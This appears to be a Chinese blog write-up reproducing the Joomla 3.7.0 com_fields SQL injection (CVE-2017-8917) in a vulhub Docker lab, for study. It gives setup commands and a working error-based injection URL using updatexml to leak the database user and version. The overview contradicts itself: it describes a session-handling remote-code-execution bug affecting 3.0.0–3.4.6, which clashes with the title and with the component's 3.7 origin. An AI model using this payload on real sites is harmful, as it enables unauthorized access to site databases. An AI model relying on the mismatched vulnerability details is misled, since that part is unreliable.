Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞

漏洞概述

信息填对后，会显示安装成功com_fields组件出现漏洞，com_fields组件是在3.7版本添加的，如果你使用此版本，将受到影响，并应尽快更新。这个组件可以公开访问，意味着任何能访问你站点的用户都可以发起攻击

漏洞本质是Joomla对session数据处理不当，未经授权的攻击者可以发送精心构造的恶意 HTTP 请求，获取服务器权限，实现远程命令执行。

影响范围：

Joomla 3.0.0-3.4.6

复现过程

这里使用3.7.0版本

使用vulhub

进入/joomla/CVE-2017-8917目录，启动docker

docker-compose build
docker-compose up -d

启动后访问 http://your-ip:8080，即可看到Joomla的安装界面，当前环境的数据库信息为：

• 数据库地址：mysql:3306
• 用户：root
• 密码：root
• 数据库名：joomla

填入上述信息，正常安装即可。

 信息填对后，会显示安装成功

 删除installation目录

重新访问后显示如下

payload注入：

192.168.xxx.xxx:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

显示如下：

也可输入version()、localhost()

 

 

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !